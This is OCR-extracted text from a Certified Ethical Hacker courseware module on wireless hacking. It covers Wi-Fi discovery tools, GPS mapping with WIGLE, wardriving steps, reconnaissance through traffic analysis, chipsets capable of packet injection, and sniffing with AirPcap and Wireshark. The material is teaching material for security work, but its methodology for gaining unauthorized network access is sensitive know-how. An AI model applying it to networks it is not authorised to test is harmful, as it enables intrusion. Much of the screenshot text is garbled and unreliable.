Cehv8 Module 15 Hacking Wireless Networks.pdf 5b3i3t

60

D#vtc* O O M fl IP) 192 168 0 112 £eternal IP

95 2 23 13 S 206

‫כבש‬

a

FIGURE 15.33: Network Signal Info screenshot

Module 15 Page 2249

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

(«:») INT6RN6T AR6A

Exam 312-50 Certified Ethical Hacker

W iF i M anager Source: http://kmansoft.com

WiFi Manager is software that allows you to get a full explanation of the Wi-Fi connection state that is used with a screenshot widget. You can get information about when it was switched on/off connection process, signal level presented in colors, and the current network's SSID.

WIFI Manager

Settings

1

b I

A u to

U p d ate

5 GHz Channels Do not display dBm

in R a d a r m o d e

Show M lm wt l*v*ls is dBm P la y s o u n d fo r o p e n n e tw o rk

Sound dtubled C hoo se sound

V ib r a t e fo r o p e n n e tw o r k s

H

Vttort&on disabkd

™

IB S S w a r n in g

_

Warn about IBSS (AdHoc) rwtwocks no( w o r io n f

N o tif ic a t io n ic o n

00no( srtow *sum s tvir !ton E n a b le W iF i o n s ta r t

w '.

B

FIGURE 15.34: WiFi Manager Screenshot

Module 15 Page 2250




6?

OpenSignalMaps Source: http://opensignal.com

This website delivers you with visualization and study-based data together with the exact signal of the service providers in a particular area with cellular coverage maps. O O f r f ■ 1232 1

4‫♦ ׳‬ Ovtr*«w

U»p

Grapli

$c»*d

C«t•

.11

CVtrvww

IX IfUo

0

O

t

Grich

Scw d

Cells

«m**rfOO(•«dBn. ‫ ״״*י‬C10867J

Signal strength: 28%

Jtow m round newfey. xiuon rafitilMd. Auurat• to

to 4 j g f .

Tower direction:

<-=>

r^i

cd1

FIGURE 15.35: OpenSignalMaps showing the signal of service providers with cellular coverage maps

Module 15 Page 2251




W i- F i D i s c o v e r y T o o l s [■ j ib

WiFi Hopper

Wellenreiter

h ttp ://w w w . w ifi hopper, com

h ttp://w ellenreiter.sourceforge.net

W a v e s tu m b le r

AirCheck Wi-Fi Tester

h ttp ://w w w .cq u re .n e t

http://w w w .fluke ne tw o rks.com

PW h

iStumbler ,

,

j

AirRadar 2 h ttp ://w w w . koingos w. com

h ttp ://w w w .istu m b le r.n e t

WiFinder

X ir r u s W i- F i In s p e c t o r

h ttp ://w w w .p g m s o ft. com

h ttp ://w w w .xirru s.com

Meraki WiFi Stumbler http ://m e ra ki.co m

CEH

t&

W if i A n a ly z e r

h ttp ://a .fa rp ro c . com

Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi Discovery Tools Wi-Fi discovery tools can discover networks (BSS/IBSS) and detect ESSID broadcasting or % non-broadcasting networks and their W EP capabilities and the manufacturer automatically. These tools enable your Wi-Fi card to find secured and unsecured wireless connections where you are. A few of the Wi-Fi discovery tools are listed as follows: &

WiFi Hopper available at http://www.wifihopper.com

9

Wavestumbler available at http://www.cqure.net

9

iStumbler available at http://www.istumbler.net

9

WiFinder available at http://www.pgmsoft.com

Q

Meraki WiFi Stumbler available at http://meraki.com

Q Wellenreiter available at http://wellenreiter.sourceforge.net 9

AirCheck Wi-Fi Tester available at http://www.flukenetworks.com

9

AirRadar 2 available at http://www.koingosw.com

9

Xirrus Wi-Fi Inspector available at http://www.xirrus.com

9

Wifi Analyzer available at http://a.farproc.com

Module 15 Page 2252




W ireless H acking M ethodology

CEH UrtifM

tUx*l Nm Im

The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources

C o m p ro m ise the W i-Fi N e tw o rk

Lau n ch W ire le ss A tta c k s

C ra c k

Wi-Fi

Copyright © b y

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

Wireless Hacking Methodology The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources. To accomplish this objective, first you need to discover Wi-Fi networks and then perform GPS mapping of networks.

Module 15 Page 2253




G P S M a p p in g

CEH

C«rt1fW4

ItkKjl Nm Im

Attackers create map of discovered Wi-Fi networks and create a database with statistics collected by Wi-Fi discovery tools such as Netsurveyor, NetStum blers etc.

W

J

G PS is used to track th e location o f the discovered Wi-Fi networks and the coordinates are ed to sites like W IG L E

J

Attackers can share this inform ation with the hacking to com m unity or sell it to make m oney

V 1 ____________ ►> L ^ 1I A ttacke r

1 1

------------ > r

D isco ve ry o f W i-F i

Post th e GPS

n e tw o rk s

locations to W IG L E


GPS M apping GPS is funded and controlled by the Department of Defense (DOD) USA. It was especially designed for the US military, but there are many civilian s of GPS across the world. A GPS receiver calculates position, time, and velocity by processing specifically coded satellite signals of GPS. Attackers know that free Wi-Fi is available everywhere and also there may be a possibility of unsecured network presence. Attackers usually create maps of discovered Wi-Fi networks and create a database with statistics collected by Wi-Fi discovery tools such as Netsurveyor, NetStumblers, etc. GPS is used to track the location of the discovered Wi-Fi networks and the coordinates ed to sites like WIGLE. Attackers can share this information with the hacking to community or sell it to make money.

L eJ A tta c k e r

‫ ־י‬I r J

D is c o v e r y o f W i- F i n e tw o rk s

P o st th e G P S lo c a t io n s t o W IG L E

FIGURE 15.36: Tracking the location of the discovered Wi-Fi network and ing it to WIGLE site

Module 15 Page 2254




GPS M apping Tool: W IG LE Source: http://wigle.net WIGLE consolidates location and information of wireless networks world-wide to a central database, and provides -friendly Java, Windows, and web applications that can map, query, and update the database via the web. Using this can add a wireless network to WIGLE from a stumble file or by hand and add remarks to an existing network. It allows finding a wireless network by searching or browsing the interactive map.

Module 15 Page 2255




♦ C <1 |D

Wigle.net/9ps/gp5/Map/onl1nefrap2/’ mapla1^39 7SS9S856&maplon^-86.02879333. &

5Wiki

Homo Foiums Po«t Fila Query Ssmcnshots SU JS s Wob Maps

Browsable Map 0 the World

s

Link to th|s ‫ווו‬0 ‫נן‬ T | |

Map

|

Satellite

|

H ,3 fd

1

ren a n

|

atrude

39 7092 to 39 3092

ngrtude -£6 0349 to -86 0077 U S Geocoding

State

-

‫ ־״־‬Zip r_3 y_

BSSID 130 00 00 00 00 05‫־‬ Stan Year

2001 ‫׳י‬

Erd Year

2013[‫־‬-

Use OpenStreetMaps 11 Possible FreeNet ° Possible Commercial Met F rst Discovered By Me First Discovered By Others I No Labels y

PoM.Air i Wit IJet *nx*

+ ®‫“ ״‬,"•.u,

I GSM Cellular Net COMA Cellular Met lUpcatel Notes Double click or drag on map to re center Hyou zoom m far enough ssid will be displayed 2‫ ־‬: re mao doesnt show up try the previous or original webntaos instead v.1de voa ‫ ׳‬purple less dense yellow more dense close view red wifi low QoS green wifi high QoS blue cell tower 3 ‫ ב‬jalitv of Signal higher seen multiple times by multiple ooservers Downoad our Android App

Go gle [ search the map

FIGURE 15.37: WIGLE locating the wireless network by searching the interactive map

Module 15 Page 2256




ShowHg slalions 1 thiough 100 of this query |nexl100 » | MP

| z

‫ ־״‬rid

•rid

L◦ 3S 00.02X0 3;‫׳‬

m *rtt;

‫יזז־ו‬

Y

f/RA ‫•יו־סי׳‬

!Hr■

7

Qtt CO 00 00 0c CO 3*

'211

an

COOO 00 00:00.18

•o-hsc

♦

XEHCX s2>*P0 *AT10n

30 OC 00 DO 00 IE

)Eiv»^Q*r ■nKanniVi. 2 1! cooo 00 00-00 28 FlMMO• Mi d U B■

triloig

tl

i9 75C9C8‫־׳‬C •80 02879333

COOO 03 3 K 3 1 ' oc 3002 12 CO OC 00 18 20 4;

U

37 70557730 •92 992 ?0 '93

’

000040 2 0 10 -1 ‫־‬X 21 :oc: CO 9C 00 01 ‫ »״‬31

N

05 9129:191

N

*5 *9C070SC ■121 3895C9C!

‫ל‬

0* 23 15 3C ‘9 Z9 9e 3‫־‬

*

-83.408*1875

‫י *־ו‬

*

Y

in*■

3

7

:030 03 20 10 -1 * OC 01 non? CO X 00 1*41 19

N

*8 57787323

■M *34*118■

2034 09 23C3-0327 :3 3« S3 10 1«4e

Y

?3 42516891

14 84800-57

*0 ‫־‬2-05- 2012-00• 2a 3* C7 04 43 10 2* 03

*

68 GT812CT4

12 84328201

39 7837:3*4

88 ‫־‬0381135

’

0 00000300

0 09000000

Y

83 1‫ נ‬1525‫ב־‬

3 ’ QAO^uMt

in*•

7

•47*

‫י מי‬

‫ל‬

“ ‫־‬ 04 00 0C 00 00 00 3E Map

trilat

:033-08- 2 0 1 1 -00• 09 92 CSC: 1• 4e 24 23 •9 ' I

00 0C 00 00 00 2E

Ss> co 00 00 00 00 36

U ’ “ ‫״«•" '•־׳־‬

7

2011-08• 2011-08• 03 03 &02* 17 UJ 20 2‫צ‬ 2011-01•

COOO 00 03 CO 41

!•*»

3

7 00 1C 5‫י‬

211 CO OO 00.00.00.4* Mag

wii(1

acne =*-'331 :•033-7*3?

co oo 00.00.co. ;‫ ■״‬ReaHSP 03917478

l« JI

!1

II

II

1

info

‫ל‬

2010-11• 2010-12• 1e 23 15 5* 56 C9!* 07

1**3

‫ל‬

2)3548- 20Cr -38DC 18 3003 M 3 23 ‫ ־‬CO 43 29

II

p m a . :‫״>!>נ‬3.||

||

Y

33.91335187 -84.337371 ‫ד‬3 ||

FIGURE 15.38: WIGLE Screenshot

Module 15 Page 2257



G P S


M

Skyhook's Wi-Fi Positioning System (WPS) determines location based on Skyhook's massive worldwide database of known Wi-Fi access points

a p p in g

<-

C

T o o l: S k y h o o k

(: wvm-skytwokwirelessxomnoc.

rage.php

Type in your eccre-ss and cfcck Find It

ook Location

http://www.skyhookwireless.com


GPS M apping Tool: Skyhook K-Xv‫־‬

Source: http://www.skvhookwireless.com

Skyhook's Wi-Fi Positioning System (WPS) determines location based on Skyhook's massive worldwide database of known Wi-Fi access points. It uses a combination of GPS tracking and a Wi-Fi positioning system for determining the location of a wireless network indoor and in urban areas. It even discovers the position of the mobile device at a distance of between 10 to 20 meters with the help of the MAC address of the nearby wireless access points and proprietary algorithms.

Module 15 Page 2258



Q

S kyhook Location Te

4‫־‬

C

D


‫____ ץ‬

w w w .skyh ookw 1reless.com

☆ =

x a t io n t e ‫^ ׳‬ology/ca«»‫־‬rage.php

Typ• in your 6ddr«ss and click Find k.

oo k Location

fctV *ReJ|c°

Su p p o rt

.£n I* Gfm a,•'

**r.

Tm• ‫** •י‬CS l* rc a se -E > c a i« n i« N ational M orm m eA;t ?*$ +*‫■י‬ Wr-~-- - '*oidA

•

■

\ . /

Ljt■

C o

« ‫ י‬T 4 • L

O unV M W y N M W Pul

‫■* י‬

G r a n d ./ ♦ S

f

i l a s W K j 'I S ‫י‬ M . ' ,H w e F ie fi

• | | • G‫«׳‬r>dC*010‫׳‬f1

i ? Y JuiilMa

F M

'■ Si & g f c a /

uJ

v‫׳‬

✓

1

Aviio*•

Arizona

; •

:

r •v

•N

uap data C2E12 Gogfltt • ‫ ׳‬m o l U w

1

-

*»*-‫■־‬ *

t #‫ן‬

A d d r e s s lo o k u p

235 2nd Si San Francisco CA

Find It

FIGURE 15.39: Skyhook Screenshot

Module 15 Page 2259


,

,


W


i- F i H o ts p o t F in d e r : j iW

w jiw ire

ir e

0 o 4‫׳‬ ‫ם‬ W i- R F in d e r

O ptions

C E H

-

,,‫ ן‬Q

@

♦

22 near M arket Street

5 :1 8

pm

Q. Ust

Ji W ir e is a W i- Fi h o tsp o t lo catio n d ire c to ry w ith m o re th a n 788,723 fre e an d paid W i- Fi h o tsp o ts in 145 c o u n trie s http://v4.jiwire.com

Copyright © b y IG - C 0 H C il. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-F i Hotspot Finder: JiWire Source: http://v4.jiwire.com JiWire is a Wi-Fi hotspot location directory with more than 788,723 free and paid Wi-Fi hotspots in 145 countries and it monitors your wireless connections. It is a simple way you can discover wireless Internet that small businesspeople take advantage of as well as persons working remotely. Individuals can easily browse for Wi-Fi hotspots not only based on their location, but also based on any predetermined criteria such as address, city, or ZIP code.

Module 15 Page 2260




Jl W ITG - ■‫ י ל‬w m

1 ‫■** ׳״•י*)יי*יי‬ < *■ < «1c»vpi

p

I

F in d e r

Q

13 Free

f i 9 Pay

lip'

FIGURE 15.41: JiWire discovering free and paid Wi-Fi hotspots

Module 15 Page 2261



W


i- F i H o ts p o t F in d e r : W

e F i

C E H (•rtifwtf

ttfciul lUchM

W v ia*p*I

www.wefi.com ‫־‬nacs/

235 2nd St San francisco CA

SEARCH \ \

h ttp ://w w w . wefi. com Copyright © by IC-50U!1C1I. All Rights R eserved. Reproduction is Strictly Prohibited

^ W i-Fi Hotspot Finder: W eFi > Source: http://www.wefi.com WeFi provides you with Wi-Fi hotspot locations. It discovers the new connection and automatically connects you to the one that is the best for your needs. The desktop version will add the newly founded hotspots with the help of your system to the WeFi database automatically. You can even find nearby Wi-Fi hotspots in your vicinity with WeFi.

Module 15 Page 2262




FIGURE 15.38: WeFi locating Wi-Fi hotspots

Module 15 Page 2263




H o w to D i s c o v e r W i ‫־‬Fi N e t w o r k U s i n g W a r driving STEP 1

*

€

STEP 3

STEP 2

Install and launch

w ith W IG L E and

Connect the antenna,

d ow nlo ad m ap packs of

G P S device to th e laptop

N etStum b ler and W IG L E

you r area to v ie w the

via a U S B serial ad ap ter

client so ftw are and turn

plotted access points on

and board on a car

on the G PS device

a geographic map

STEP 6

STEP 5

Drive th e car at speeds

C apture and save the

this log file to

of 35 mph or b elo w (At

N etStu m b ler log files

W IG L E , w hich w ill then

higher speeds, Wi-Fi

w hich contains G PS

au tom atically plot the

an ten na will not be able

coordinates of the

points onto a map

to d etect Wi-Fi spots)

access points

Copyright © b y

EG-Grancil. All


‫י‬

f

How to Discover W i-F i Network Using W ardriving

Wardriving is one of the techniques used for discovering the Wi-Fi networks available in the vicinity. In order to discover Wi-Fi networks using wardriving, the should follow these steps: Step 1: with WIGLE and map packs of your area to view the plotted access points on a geographic map. Step 2: Connect the antenna and GPS device to the laptop via a USB serial adapter and put it in your car. Step 3: Install and launch NetStumbler and WIGLE client software and turn on the GPS device. Step 4: Drive the car at speeds of 35 mph or below (at higher speeds, the Wi-Fi antenna will not be able to detect Wi-Fi spots). Step 5: Capture and save the NetStumbler log files that contain GPS coordinates of the access points. Step 6: this log file to WIGLE, which will then automatically plot the points onto a map.

Module 15 Page 2264




Wireless H a c k i n g M e t h o d o l o g y

C E H

■>1 ■

;

V

V

: ^


C o m p ro m ise th e W i-Fi N e tw o rk

C ra c k W i-F i E n c ry p tio n

L au n ch W ire le ss A tta c k s


- ^ Wireless H acking Methodology _ ® As mentioned previously, the objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources. In the wireless hacking methodology, the third phase is to analyze the traffic. An attacker performs wireless traffic analysis before committing actual attacks on the wireless network. This wireless traffic analysis helps the attacker to determine the vulnerabilities in the target network.

Module 15 Page 2265




W ir e le s s T r a ffic A n a ly s is Identify Vulnerabilities

j

C EH

Wi-Fi Reconnaissance

1. Wireless traffic analysis enables

)

Attackers analyze a wireless network

attackers to identify vulnerabilities

to determine:

and susceptible victims in a target

‫ י‬Broadcasted SSID

wireless network

‫ י‬Presence of multiple access points

2. This helps in determining the appropriate strategy for a successful attack

■ Possibility of recovering SSIDs

3. Wi-Fi protocols are unique at

* Authentication method used

Layer 2, and traffic over the air is not serialized which makes easy to sniff and analyze

‫ י‬WLAN encryption algorithms

wireless packets

Wireshark/Pilot Tool

OmniPeek Tool

CommViewTool

Wi-Fi packet-capture and analysis products come in a number of forms

AirMagnet Wi-Fi Analyzer

Copyright @ b y iC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.

r1.rt.rwfu‫״‬

Wireless Traffic Analysis

Wireless traffic analysis provides a detailed report of the who, what, when, and of Wi-Fi activities. The traffic analysis process involves multiple tasks, such as normalization and mining, traffic pattern recognition, protocol dissection, and reconstruction of application sessions. It enables attackers to identify vulnerabilities susceptible victims in a target wireless network. The wireless traffic analysis helps

how data the and

Id e n t if y in g V u ln e r a b ilit ie s Wireless traffic analysis enables attackers to identify vulnerabilities and susceptible victims in a target wireless network. It helps in determining the appropriate strategy for a successful attack. Wi-Fi protocols are unique at Layer 2, and traffic over the air is not serialized, which makes it easy to sniff and analyze wireless packets. W i- F i R e c o n n a i s s a n c e Attackers analyze a wireless network to determine: 9

Broadcast SSID

9

Presence of multiple access points

9

Possibility of recovering SSIDs

9

Authentication method used

Module 15 Page 2266



9


WLAN encryption algorithms

Wi-Fi packet-capture and analysis products come in a number of forms. Several tools are available online to perform wireless traffic analysis. Examples of wireless traffic analysis tools include CommView Tool, AirMagnet Wi-Fi Analyzer, Wireshark/Pilot Tool, and OmniPeek Tool.

Module 15 Page 2267



W

ir e le s s


C a r d s

a n d

C h ip s e t s

C E H (•rtilwd

EUk«I NMhM

1 J

Choosing the right Wi-Fi card is very important since tools like Aircrack-ng, KisMAC only works with selected wireless chipsets

Copyright © b y IC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.

Wireless Cards and Chipsets Choosing the right Wi-Fi card is very important since tools like Aircrack-ng and KisMAC only work with selected wireless chipsets. A few considerations are mentioned here that the should follow in order to choose the optimal Wi-Fi card. D e t e r m in e y o u r W i- F i r e q u ir e m e n ts Decide if you simply want to listen to wireless network traffic or both listen to and inject packets. Windows have the capability of only listening to network traffic but don't have the capability of injecting data packets, whereas Linux has both the listening and injecting packets capability. Based on these issues here you need to decide: © The operating system that you want to use. Q

Hardware format such as PCMCIA or USB, etc.

9

And the features such as listening or injection or both. L e a r n th e c a p a b ilit ie s o f a w ir e le s s c a r d

Wireless cards involve two manufacturers. One is the brand of the card and the other is the one who makes the wireless chipset within the card. It is very important to realize the difference between the two manufacturers. Knowing the card manufacturer and model is not sufficient to choose the Wi-Fi card. The should know about the chipset inside the card. Most of the chipset manufacturers don't want to reveal what they use inside their card, but for

Module 15 Page 2268




the s it is critical to know. Knowing the wireless chipset manufacturer allows the s to determine the operating system that it s, required software drivers, and the limitations associated with them. D e t e r m in e th e c h ip s e t o f th e W i- F i c a r d The first needs to determine the wireless chipset inside the card that they are thinking to use for their WLAN. The following are the techniques that can be used to determine the chipset inside a Wi-Fi card: 9

Search the Internet.

9

You may have a look at Windows driver file names. It is often the name of the chipset or the driver to use.

9

Check the manufacturer's page.

9

You can physically see the wireless chip on some cards such as PCI. Often the chipset number can also be observed.

9

You can use the FCC ID Search to lookup detailed information of the device in case if the device consist a FCC identification number on the board. It gives the information of the card about the manufacturer, model and the chipset.

Sometimes the card manufacturers change the chipset inside the card while keeping the same card model number. This is usually called "card revision" or "card version." So, while determining the chipset of the Wi-Fi card, make sure to include the version/revision. The chipset determining ways may vary from one operating system to the other. You may visit http://madwifi-proiect.org/wiki/Compatibilitv for compatibility information. V e r if y th e c h ip s e t c a p a b ilit ie s ♦ After choosing a Wi-Fi card, check or whether the chipset is compatible with your operating system and check whether it is meeting all your requirements. If the chipset is not compatible with the OS or not meeting the requirement criteria, then change either the OS or the chipset depending on the requirement. D e t e r m in e th e d r iv e r s a n d p a tc h e s r e q u ir e d —‫׳‬

You can determine the drivers required for the chipset using the drivers section and determine the patches required for the operating system.

After determining all these considerations of a chipset the can find a card that uses that particular chipset with the help of compatible card list.

Module 15 Page 2269




Wi-Fi USB Dongle: AirPcap

CEH

J

AirPcap adapter captures full 802.11 data, management, and control frames that can be viewed in Wireshark for in-depth protocol dissection and analysis

J

AirPcap software can be configured to decrypt WEP/WPA-encrypted frames

L=l!

AirPcap Control

^

F e a tu re s

Settings Keys_________________________________________________

®

It provides capability for

Interface

simultaneous multi-channel capture

AiPoap USB wwetess capture adaptef nr. 00

v]

Blink Led

and traffic aggregation Mode( AjrPcap Nx

© It can be used for traffic injection

4

Medw: 802.11 /b/jj/n

Basic Conflation

that help in assessing the security of

Channel

a wireless network

2412MHz(BG 1)

Extension Channel

© AirPcap is ed in Aircrack-ng, Cain and Able, and W ireshark tools 9

Transmit yes

j

CepmeTjue

v

\y\Include 80211 FCS in Frames

v

FCS Fiei

0

802110n(y

All Flames

v

A irPcapReplay, included in the AirPcap Softw are Distribution, replays 802.11 network traffic that Reset Configuration

is contained in a trace file

http://www.riverbed,com Copyright © by IC - C o u cil. All Rights Reserved. Reproduction is Strictly Prohibited.

*

W i-Fi USB Dongle: AirPcap Source: http://www.riverbed.com

AirPcap captures full 802.11 data, management, and control frames that can be viewed in Wireshark providing in-depth protocol dissection and analysis capabilities. All AirPcap adapters can operate in a completely ive mode. In this mode, the AirPcap adapter can capture all of the frames that are transferred on a channel, not just frames that are addressed to it. This includes data frames, control frames and management frames. When more than one BSS shares the same channel, it can capture the data, control, and management frames from all of the BSSs that are sharing the channel within range of the AirPcap adapter. AirPcap adapters capture traffic on a single channel at a time. The channel setting for this can be changed using the AirPcap Control , or from the "Advanced Wireless Settings" dia Wireshark. Depending on the capabilities of a specific AirPcap adapter, it can be set to any valid 802.11 channel for packet capture. It can be configured to decrypt WEP-encrypted frames. An arbitrary number of keys can be configured in the driver at the same time, so that the driver can decrypt the traffic of more than one access point simultaneously. W PA and WPA2 is handled by Wireshark. When monitoring on a single channel is not enough, multiple AirPcap adapters can be plugged into your laptop or a USB hub and provide capability for simultaneous multi-channel capture and traffic aggregation. The AirPcap driver provides for this operation through MultiChannel Aggregator technology that exports capture streams from multiple AirPcap adapters as

Module 15 Page 2270




a single capture stream. The Multi-Channel Aggregator consists of a virtual interface that can be used from Wireshark or any other AirPcap-based application. Using this interface, the application receives the traffic from all installed AirPcap adapters, as if it was coming from a single device. The Multi-Channel Aggregator can be configured like any AirPcap device, and therefore can have its own decryption, FCS checking, and packet filtering settings. It can be used for traffic injection that helps in assessing the security of a wireless network. It is ed in Aircrack-ng, Cain and Able, and Wireshark tools. AirPcapReplay, included in the AirPcap Software Distribution, replays 802.11 network traffic and that is contained in a trace file.

AirPcap Control S e ttn g s

L- - L5 1 1 ‫־־‬

Keys

In te r f a c e

A ir P c a p U S B

M odel

V

w v e le s s c a p tu r e a d a p te r n r 0 0

A «Pcap N x

T r a n s m it

yes

B fc n k L e d

M ed a

80211

a/b/g/n

B a s i c C o n fig u r a t io n

Channel

2 4 1 2 M H z (B G

E x te n s io n C h a n n e l

C a p tu re T y p e

1)

@

In c lu d e 8 0 2 1 1

F C S in F r a m e s

V

0

80211

v

O n fc

V

F C S F ie r

A I Fram es

v

H e lp

R e s e t C o n fig u r a t io n

0 k

A p p ly

J

C ancel

FIGURE 15.39: AirPcap capturing 802.11 data

Module 15 Page 2271




Wi-Fi Packet Sniffer:W ireshark with AirPcap

r EH

W i-Fi Packet Sniffer: W ireshark w ith AirPcap Source: http://www.wireshark.org Wireshark is a network protocol analyzer. It lets d capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions. Features: © Live capture and offline analysis © Standard three-pane packet browser © Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others © Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility © Display filters © VoIP analysis © Read/write many different capture file formats: tdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments

Module 15 Page 2272




Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others 9

Capture files compressed with gzip can be decompressed on the fly

9

Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)

© Decryption for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2 Q

Coloring rules can be applied to the packet list for quick, intuitive analysis

9

Output can be exported to XML, PostScript, CSV, or plaintext _

Capturing from AirPcap USB wireless capture adapter nr. 00 - Wireshark

a

x

Capture gnaly:< Jtatrctics Telephony Joo*! fctelp E* £<* n <E<E<•*□ * ® ‫ * *יי‬a i « « a » kcsxea ^ ♦ + * ? 2 - Eiprtiuon... Clear Apply All Frames WfreirssSetting}... DecryptionKeys.‫״‬ 802.11Channel: 2412[BG1] ‫ פ‬Channel Offset 0 0FCS Destination Protocol No. Tim* Source Info

1 1

F ille r

2 2 7 7 1 0 0 . 7 9 1 9 2 9 b 8 : a 3 : 8 6 : 3 e : 2 f : 37

B ro a d c a s t

IE E E

8 0 2 .1 1

Beacon

frj

SN -609.

fn

-0 ,

F la g s • .

8 1 *1 0 0 ,

S

2 2 7 8 1 0 0 .8 9 2 5 5 0 b 8 : a 3 : 8 6 : 3 e : 2 f :3 7

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fr i

S N —6 1 0 ,

FN -O ,

F la g s - .

B I- 1 0 0 ,

S

2 2 7 9 1 0 0 .9 9 4 7 9 5 b 8 : a 3 : 8 6 : 3 e : 2 f : 37

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fr j

S N —6 1 1 ,

FN -0,

F la g s - .

61-100,

S

I

2 2 8 0 1 0 1 .0 0 2 2 8 9 S h a n g h a i_ 2 5 : 6 3 : 1 0

B ro a d c a s t

IE E E

8 0 2 .1 1

Beacon

fr j

SN -2269,

2 2 8 1 1 0 1 .0 9 7 1 6 8 b 8 : a 3 : 8 6 : 3 e : 2 f :3 7

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

S

I

2 2 8 2 1 0 1 .1 0 4 7 8 8 S h a n g h a 1 _ 2 5 : 6 3 : l O

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fn

sn

2 2 8 3 1 0 1 .1 7 2 9 2 1 N e t g e a r _ a e : 2 4 : c c

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

f n

SN -1S30,

2284 1 0 1 .1 9 9 5 6 4 b 8 : a 3 : 8 6 : 3 e : 2 f :3 7

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fn

SN -613,

2 2 8 5 1 0 1 .2 0 7 1 6 2 s h a n g h a i _ 2 5 : 6 3 : 1 0

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fr j

SN -2277,

2 2 8 6 1 0 1 .2 0 7 9 1 0 S h a n g h a i _ 2 5 :6 3 : 1 1

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fr j

SN -2278,

2 2 8 7 1 0 1 .2 0 9 5 3 3 S h a n g h a i _ 2 5 : 6 3 : 1 3

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fr i

SN -2280,

fn

sn

fr j

SN -612,

FN -0, FN -0,

-2273,

F la g s *

,

F la g s - .

61=100, 61-100,

-O ,

F

ags-

,

B I- 1 0 0 ,

FN -0.

F

ags-

.

B I- 1 0 0 ,

fn

FN -0,

F la g s

FN -0. FN -0, FN -0.

B I- 1 0 0 ,

F

ags-

,

61-100,

F

ags-

.

B I- 1 0 0 .

F

ags-

.

S

B I- 1 0 0 .

2 2 8 8 1 0 1 . 3 0 2 0 4 5 b 8 : a 3 : 8 6 : 3 e : 2 f : 37

B ro a d c a s t

IE E E

8 0 2 .1 1

Beacon

2 2 8 9 1 0 1 .3 7 7 6 7 4 N e t g e a r . a e : 2 4 : c c

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fn

SN -1532,

FN -0,

F

ags-

,

B I- 1 0 0 .

2 2 9 0 1 0 1 .4 1 2 0 6 7 S h a n g h a i _ 2 5 : 6 3 : 1 0

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fr j

SN -2285,

FN -0.

F

ags-

.

B I- 1 0 0 [K

2 2 9 1 1 0 1 .4 1 3 6 7 2 s h a n g h a i _ 2 5 : 6 3 : 1 2

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fr j

SN -2287,

FN -0,

F

ags-

,

B I- 1 0 0 .

2 2 9 2 1 0 1 .5 3 9 6 9 9 9 8 : e 2 : C b : 3 5 : d b :3 9

B ro a d ca st

IE E E

8 0 2 .1 1

o a ta ,

F la g s • .p .

. .F .

2293 1 0 1 . 582580 N e tg e a r _ a e :2 4 :c c

d 2 :ff:ff:f

IE E E

8 0 2 .1 1

Beacon

fra n c ,

SN -1535,

FN -0,

F

ags-

.

B I- 1 0 0 .

2 2 9 4 1 0 1 .8 2 3 4 7 1 S h a n g h a i_ 2 5 : 6 3 : 1 2

B ro a d ca st

IE E E

8 0 2 .1 1

Beacon

fra m e ,

SN -2303,

FN -0.

F

ags-

.

B I- 1 0 0 ,

• Fra m e

1:

85

b y te s

on w ir e

• IE E E

8 0 2 .1 1

O is a s s o c ia t e ,

*

8 0 2 .1 1

w ir e le s s

IE E E

♦ * • !f o r m e d 0000 0010 0020 0030 0040

aO 1 2 020 9 640 0 d64 f 81 4 c

P a c l.e t: 00 20 5b a e 31 1 4 7 2 84 2 2 bO

la s

IE E E

e d 77 24 c c 0 9 07 d9 fO 43 c2

(6 8 0

b its ),

F la g s :

85

b y te s

c a p tu re d

(6 8 0

sn

—1 5 3 4 ,

-6 1 4 ,

FN -9,

FN -0,

F la g s

I

B I- 1 0 0 ,

S

|

- 1

b its )

...P .■ F .

m anagem ent

fra m e

8 0 :. 11]

bb fb 6 0 14 O e 65 0 0 04 2 4 83

ed 7f 72 44 92

ff 41 47 00 4c

a a Oc e a d8 do 7d 70 4 e 0 0 80 c 5 6 b 73 05 04 32 0 8 0 0 0 0 0 5 1 0 2 9 3e 04 41

do 48 63 04 20

. . ] . J .‫ ־‬.

d .l....e . o r ........... d

. l".C.S. nAI/l (IAA M H AifPcapUS8wirelesscaptureadapternr.00:... Packets:2578Displayed2578Marked;0

•A } p N . . H r c .K s ..c . 2 ........... A

.L.)>.

Profile Default

FIGURE 15.40: Wireshark with AirPcap capturing network traffic

Module 15 Page 2273




Wi-Fi Packet Sniffer: Cascade Pilot J

It m easures w ireless channel utilization

J

